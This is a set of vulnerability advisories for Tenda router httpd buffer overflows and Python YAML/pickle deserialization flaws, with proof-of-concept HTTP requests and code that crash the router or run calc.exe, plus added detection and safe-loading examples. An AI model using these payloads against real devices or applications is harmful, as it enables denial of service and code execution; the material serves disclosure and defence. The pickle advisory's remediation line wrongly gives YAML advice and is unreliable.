CVE-2020-13394: Tenda Vulnerability

Vendor of the products:  Tenda 

Reported by:       Joel

CVE-2020-13394    CVE_details

Affected products:  

AC9 V1.0 V15.03.05.19(6318)_CN
AC9 V3.0 V15.03.06.42_multi
AC15 V1.0 V15.03.05.19_multi_TD01
AC18 V15.03.05.19(6318_)_CN
AC6 V1.0 V15.03.05.19_multi_TD01

Overview

An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318), AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318) devices. There is a stack-based buffer overflow in the router's web server, httpd. While processing the list parameter of a POST request, the value is passed directly to strcpy into a local variable on the stack, which overwrites the function's return address. An attacker can construct a payload to execute arbitrary code.

POC

This PoC results in a DoS (the httpd process crashes).

Out of consideration for the vendor's security, we only provide part of the HTTP request.

POST /goform/*********** HTTP/1.1
Host: 192.168.18.131
Accept:  */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Cookie: password=qpl5gk

list=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

Details

ARM

MIPS

CVE-2020-13393: Tenda Vulnerability

Vendor of the products:  Tenda 

Reported by:       Joel

CVE-2020-13393    CVE_details

Affected products:  

AC9 V1.0 V15.03.05.19(6318)_CN
AC9 V3.0 V15.03.06.42_multi
AC15 V1.0 V15.03.05.19_multi_TD01
AC18 V15.03.05.19(6318_)_CN
AC6 V1.0 V15.03.05.19_multi_TD01

Overview

An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318), AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318) devices. There is a stack-based buffer overflow in the router's web server, httpd. While processing the deviceId and time parameters of a POST request, each value is passed directly to strcpy into a local variable on the stack, which overwrites the function's return address. An attacker can construct a payload to execute arbitrary code.

POC

This PoC results in a DoS (the httpd process crashes).

Out of consideration for the vendor's security, we only provide part of the HTTP request.

POST /goform/saveParentControlInfo HTTP/1.1
Host: 192.168.18.131
Accept:  */*
X-Requested-With:  XMLHttpRequest
User-Agent:  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding:  gzip, deflate
Accept-Language:  en-US,en;q=0.9
Connection: close
Content-Type: text/plain
Cookie: password=pyl5gk

deviceId=&time=1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

Details

ARM

MIPS

CVE-2020-13392: Tenda Vulnerability

Vendor of the products:  Tenda 

Reported by:       Joel

CVE-2020-13392    CVE_details

Affected products:  

AC9 V1.0 V15.03.05.19(6318)_CN
AC9 V3.0 V15.03.06.42_multi
AC15 V1.0 V15.03.05.19_multi_TD01
AC18 V15.03.05.19(6318_)_CN
AC6 V1.0 V15.03.05.19_multi_TD01

Overview

An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318), AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318) devices. There is a stack-based buffer overflow in the router's web server, httpd. While processing the funcpara1 parameter of a POST request, the value is passed directly to sprintf into a local variable on the stack, which overwrites the function's return address. An attacker can construct a payload to execute arbitrary code.

POC

This PoC results in a DoS (the httpd process crashes).

Out of consideration for the vendor's security, we only provide part of the HTTP request.

POST /goform/********** HTTP/1.1
Host: 192.168.18.131
Accept:  */*
X-Requested-With:  XMLHttpRequest
User-Agent:  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding:  gzip, deflate
Accept-Language:  en-US,en;q=0.9
Connection: close
Content-Type: text/plain
Cookie: password=ioo5gk

save=1&msgname=1&funcname=save_list_data&funcpara1=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&funcpara2=222222222222222222222222  

Details

ARM

MIPS

CVE-2020-13391: Tenda Vulnerability

Vendor of the products:  Tenda 

Reported by:       Joel

CVE-2020-13391    CVE_details

Affected products:  

AC9 V1.0 V15.03.05.19(6318)_CN
AC9 V3.0 V15.03.06.42_multi
AC15 V1.0 V15.03.05.19_multi_TD01
AC18 V15.03.05.19(6318_)_CN
AC6 V1.0 V15.03.05.19_multi_TD01

Overview

An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318), AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318) devices. There is a stack-based buffer overflow in the router's web server, httpd. While processing the speed_dir parameter of a POST request, the value is passed directly to sprintf into a local variable on the stack, which overwrites the function's return address. An attacker can construct a payload to execute arbitrary code.

POC

This PoC results in a DoS (the httpd process crashes).

Out of consideration for the vendor's security, we only provide part of the HTTP request.

POST /goform/SetSpeedWan HTTP/1.1
Host: 192.168.18.131
Accept:  */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Cookie: password=jgi5gk

speed_dir=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

Details

ARM

MIPS

CVE-2020-13390: Tenda Vulnerability

Vendor of the products:  Tenda 

Reported by:       Joel

CVE-2020-13390    CVE_details

Affected products:  

AC9 V1.0 V15.03.05.19(6318)_CN
AC9 V3.0 V15.03.06.42_multi
AC15 V1.0 V15.03.05.19_multi_TD01
AC18 V15.03.05.19(6318_)_CN
AC6 V1.0 V15.03.05.19_multi_TD01

Overview

An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318), AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318) devices. There is a stack-based buffer overflow in the router's web server, httpd. While processing the entrys and mitInterface parameters of a POST request, each value is passed directly to sprintf into a local variable on the stack, which overwrites the function's return address. An attacker can construct a payload to execute arbitrary code.

POC

This PoC results in a DoS (the httpd process crashes).

Out of consideration for the vendor's security, we only provide part of the HTTP request.

POST /goform/addressNat HTTP/1.1
Host: 192.168.18.131
Accept:  */*
X-Requested-With:  XMLHttpRequest
User-Agent:  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding:  gzip, deflate
Accept-Language:  en-US,en;q=0.9
Connection: close
Content-Type: text/plain
Cookie: password=whz5gk

entrys=1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&mitInterface=1111111&page=11111111

Details

ARM

MIPS

CVE-2020-13389: Tenda Vulnerability

Vendor of the products:  Tenda 

Reported by:       Joel

CVE-2020-13389    CVE_details

Affected products:  

AC9 V1.0 V15.03.05.19(6318)_CN
AC9 V3.0 V15.03.06.42_multi
AC15 V1.0 V15.03.05.19_multi_TD01
AC18 V15.03.05.19(6318_)_CN
AC6 V1.0 V15.03.05.19_multi_TD01

Overview

An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318), AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318) devices. There is a stack-based buffer overflow in the router's web server, httpd. While processing the schedStartTime and schedEndTime parameters of a POST request, each value is passed directly to strcpy into a local variable on the stack, which overwrites the function's return address. An attacker can construct a payload to execute arbitrary code.

POC

This PoC results in a DoS (the httpd process crashes).

Out of consideration for the vendor's security, we only provide part of the HTTP request.

POST /goform/openSchedWifi HTTP/1.1
Host: 192.168.18.131
Accept:  */*
X-Requested-With:  XMLHttpRequest
User-Agent:  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding:  gzip, deflate
Accept-Language:  en-US,en;q=0.9
Connection: close
Content-Type: text/plain
Cookie: password=nrt5gk

schedWifiEnable=0&schedStartTime=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&schedEndTime=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

Details

ARM

MIPS
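The six Tenda advisories above (CVE-2020-13389 through CVE-2020-13394) share one pattern: a named form parameter on a /goform/ handler is copied unbounded into a stack buffer, so the only thing a request needs to stand out is an implausibly long value for one of those fields. The following is an added example, not code from the advisories or the vendor: a small triage script that parses a raw POST request like the PoCs and flags watched parameters whose value exceeds a length ceiling. The handler-to-parameter mapping, the 128-byte ceiling and the sample requests are constructed for this example.

```python
import re
from urllib.parse import parse_qsl

# Parameters the advisories above name for each /goform/ handler, plus the
# two whose handler name the page masks. The mapping, the length threshold
# and the sample requests are constructed for this added example.
SUSPECT_PARAMS = {
    "saveParentControlInfo": {"deviceId", "time"},        # CVE-2020-13393
    "SetSpeedWan": {"speed_dir"},                         # CVE-2020-13391
    "addressNat": {"entrys", "mitInterface"},             # CVE-2020-13390
    "openSchedWifi": {"schedStartTime", "schedEndTime"},  # CVE-2020-13389
}
ALWAYS_WATCHED = {"list", "funcpara1"}                    # CVE-2020-13394, -13392
MAX_VALUE_LEN = 128   # assumed ceiling; legitimate values for these fields are short

REQUEST_LINE = re.compile(r"^POST\s+/goform/([^\s?]+)")


def parse_raw_request(raw):
    """Split a raw HTTP request into (goform handler name or None, form fields)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    m = REQUEST_LINE.match(head)
    handler = m.group(1) if m else None
    return handler, parse_qsl(body, keep_blank_values=True)


def find_overlong_params(raw):
    """Return [(param, value_length)] for watched parameters exceeding MAX_VALUE_LEN.

    A non-empty result on a /goform/ POST is the signal a WAF rule or a
    log-triage script would alert on for this family of bugs."""
    handler, fields = parse_raw_request(raw)
    watched = SUSPECT_PARAMS.get(handler, set()) | ALWAYS_WATCHED
    return [(k, len(v)) for k, v in fields if k in watched and len(v) > MAX_VALUE_LEN]


# Constructed request shaped like the CVE-2020-13393 PoC, with 600 '1's in `time`.
SAMPLE_REQUEST = (
    "POST /goform/saveParentControlInfo HTTP/1.1\r\n"
    "Host: 192.168.18.131\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "deviceId=&time=" + "1" * 600
)
# Constructed benign request to the SetSpeedWan handler.
BENIGN_REQUEST = (
    "POST /goform/SetSpeedWan HTTP/1.1\r\n"
    "Host: 192.168.18.131\r\n"
    "\r\n"
    "speed_dir=up"
)

if __name__ == "__main__":
    for req in (SAMPLE_REQUEST, BENIGN_REQUEST):
        print(parse_raw_request(req)[0], find_overlong_params(req))
```

The same check can be pointed at the web server's access log or a packet capture; anything that exceeds the ceiling for these fields deserves a look, since the handlers themselves perform no length check.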

CVE-2020-13388: Vulnerability in jw.util

Python Package:  jw.util

Version:      <= 2.3 

Reported by:       Joel

CVE-2020-13388    CVE_details

Overview

An exploitable vulnerability exists in the configuration-loading functionality of jw.util before 2.3. Configuration is a module for handling configurations from a YAML source and a class for simplifying access to a configuration tree. Loading a configuration from a string or stream with YAML can execute arbitrary Python commands, resulting in command execution. An attacker can insert Python into the loaded YAML to trigger this vulnerability.

POC

from jw.util import configuration

# Both entry points hand the document to yaml.load, so the python/object/apply
# tag is honoured and os.system("calc.exe") runs while the configuration loads.
configuration.FromString('!!python/object/apply:os.system ["calc.exe"]')
configuration.FromStream('!!python/object/apply:os.system ["calc.exe"]')

Remediation

It should use yaml.safe_load to parse the YAML file.

CVE-2018-14572: Vulnerability in Conference-scheduler-cli

Python Package:  conference-scheduler-cli

Version:      <= 0.10.1 

Published:    24 Jul 2018  

Reported by:       Joel

CVE-2018-14572    CVE_details

Overview

In conference-scheduler-cli, a pickle.load call on imported data allows remote attackers to execute arbitrary code via a crafted .pickle file, as demonstrated by Python code that contains an os.system call.

POC

import pickle
from pathlib import Path
from scheduler import io

# Any object whose __reduce__ returns a callable has that callable invoked
# when the pickle is loaded; here it launches calc.exe.
class joel_test(object):
    def __reduce__(self):
        import subprocess
        return (subprocess.Popen, ('calc.exe',))

# Write the crafted pickle where import_schedule_definition expects it.
test = joel_test()
with open('solution\\scheduler.pickle', 'wb') as f:
    pickle.dump(test, f)

# The import calls pickle.load on the file, which triggers the payload.
io.import_schedule_definition(Path(Path.cwd(), 'solution'))

Remediation

It should use yaml.safe_load to parse the YAML file.
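The remediation line above carries over the YAML advice, but pickle has no safe_load counterpart: any pickle may name a callable for the loader to invoke, exactly as the PoC's __reduce__ does. The defensive option the Python documentation describes is an Unpickler whose find_class resolves only an allowlist of globals, so the callable is refused before it is ever called. The following is an added example, not code from conference-scheduler-cli; the allowlist and the sample pickles are constructed, and os.getcwd stands in for the PoC's subprocess.Popen so the demonstration has no side effects.

```python
import io
import os
import pickle

# Allowlist of globals the unpickler may resolve. A schedule solution should
# need only plain data; this set is an assumption for the example.
SAFE_GLOBALS = {
    "builtins": {"set", "frozenset", "range", "slice"},
    "collections": {"OrderedDict"},
    "datetime": {"datetime", "date", "timedelta"},
}


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse any global not on the allowlist. find_class runs before the
    callable is invoked, so an os.system or Popen reduce never executes."""

    def find_class(self, module, name):
        if name in SAFE_GLOBALS.get(module, ()):
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class CallOnLoad:
    """Stand-in for the PoC's joel_test: __reduce__ makes the unpickler call
    an arbitrary callable. os.getcwd is used here instead of Popen."""

    def __reduce__(self):
        return (os.getcwd, ())


# Constructed sample pickles: one that calls a function on load, one data-only.
MALICIOUS_PICKLE = pickle.dumps(CallOnLoad())
BENIGN_PICKLE = pickle.dumps({"slots": [1, 2, 3], "rooms": {"A", "B"}})


def load_with_plain_pickle(data):
    """What the vulnerable code does: executes whatever __reduce__ asked for."""
    return pickle.loads(data)


def load_with_restriction(data):
    """Return the object, or None if the unpickler refused a global."""
    try:
        return restricted_loads(data)
    except pickle.UnpicklingError:
        return None


if __name__ == "__main__":
    print("plain pickle ran the callable:", load_with_plain_pickle(MALICIOUS_PICKLE))
    print("restricted loader result:", load_with_restriction(MALICIOUS_PICKLE))
    print("benign data still loads:", load_with_restriction(BENIGN_PICKLE))
```

Data-only pickles (dicts, lists, strings, numbers) never consult find_class, so they load unchanged; only documents that name a global hit the allowlist. Where the input is untrusted, a format without callable semantics (JSON, YAML via safe_load) is the better choice.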

CVE-2017-16764: Vulnerability in Django_make_app

Python Package:  django_make_app

Version:      Before 0.1.3

Published:    Nov. 10th, 2017

Reported by:       Joel

CVE-2017-16764    CVE_details

Overview

django_make_app lets you define models and fields using YAML and generates a Django app with views, forms, templates, etc. An issue was discovered in the django_make_app package before 0.1.3. Untrusted data passed into the read_yaml_file function can execute arbitrary Python commands, resulting in command execution.

POC

from django_make_app.io_utils import read_yaml_file

# read_yaml_file parses the file with yaml.load, so the tag below runs
# os.system("calc.exe") during parsing.
yaml_raw_data = read_yaml_file('joel.yml')
# contents of joel.yml: !!python/object/apply:os.system ["calc.exe"]

Remediation

At present, the maintainers have not released a related patch. It should use yaml.safe_load to parse the YAML file.

CVE-2017-16763: Configure Loaded Through Confire

Python Package:  confire

Version:      Before 0.2.0

Published:    Nov. 10th, 2017

Reported by:       Joel

CVE-2017-16763    CVE_details

Overview

Confire is a simple but powerful configuration scheme that builds on the configuration parsers of Scapy, elasticsearch, Django and others. Because the user-specific configuration is loaded from ~/.confire.yaml using yaml.load(), an issue was discovered in the Confire package before 0.2.0. Untrusted data in the confire.yaml files can execute arbitrary Python commands, resulting in command execution.

POC

from confire import Configuration

class MyConfig(Configuration):
    mysetting = True
    logpath   = "/var/log/myapp.log"
    appname   = "MyApp"

# load() reads each of the paths below with yaml.load(), so a tagged
# document in any of them is executed at this point.
settings = MyConfig.load()

# CONF_PATHS = [
#     '/etc/confire.yaml',                    # The global configuration
#     os.path.expanduser('~/.confire.yaml'),  # User specific configuration
#     os.path.abspath('conf/confire.yaml'),   # Local directory configuration
# ]
# contents of ~/.confire.yaml: !!python/object/apply:os.system ["calc.exe"]

Remediation

The updated versions of confire correctly use the yaml.safe_load method which prevents remote code execution.
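The three YAML advisories above (CVE-2020-13388, CVE-2017-16764 and CVE-2017-16763) share one root cause and one fix. The following is an added example, not code from jw.util, django_make_app or confire: it shows the tag used in their PoCs being executed by a loader that honours python/object/apply and rejected by yaml.safe_load. It assumes PyYAML 5.1 or later (for yaml.UnsafeLoader) and substitutes os.getcwd for os.system so the effect is visible without side effects.

```python
import yaml

# Constructed sample documents. BENIGN_CONFIG mirrors the confire settings
# above; TAGGED_CONFIG uses the PoC tag with a harmless callable.
BENIGN_CONFIG = """
mysetting: true
logpath: /var/log/myapp.log
appname: MyApp
"""
TAGGED_CONFIG = '!!python/object/apply:os.getcwd []'


def load_config_unsafe(text):
    """The pattern these advisories describe: a loader that resolves
    python/* tags, so the document decides what gets called."""
    return yaml.load(text, Loader=yaml.UnsafeLoader)


def load_config_safe(text):
    """The remediation: safe_load builds only plain YAML types (mappings,
    sequences, scalars) and raises on any python/* tag."""
    return yaml.safe_load(text)


def is_rejected_by_safe_load(text):
    """True if safe_load refuses the document (a ConstructorError for an
    unknown tag is a YAMLError subclass)."""
    try:
        yaml.safe_load(text)
    except yaml.YAMLError:
        return True
    return False


if __name__ == "__main__":
    print("unsafe loader called os.getcwd:", load_config_unsafe(TAGGED_CONFIG))
    print("safe_load rejects the tag:", is_rejected_by_safe_load(TAGGED_CONFIG))
    print("safe_load still parses real config:", load_config_safe(BENIGN_CONFIG))
```

Note that a bare yaml.load(text) without a Loader argument raised a warning from PyYAML 5.1 and is an error from 6.0, so code that "works" on a new PyYAML has already been forced to pick a loader explicitly; the fix is still to pick safe_load.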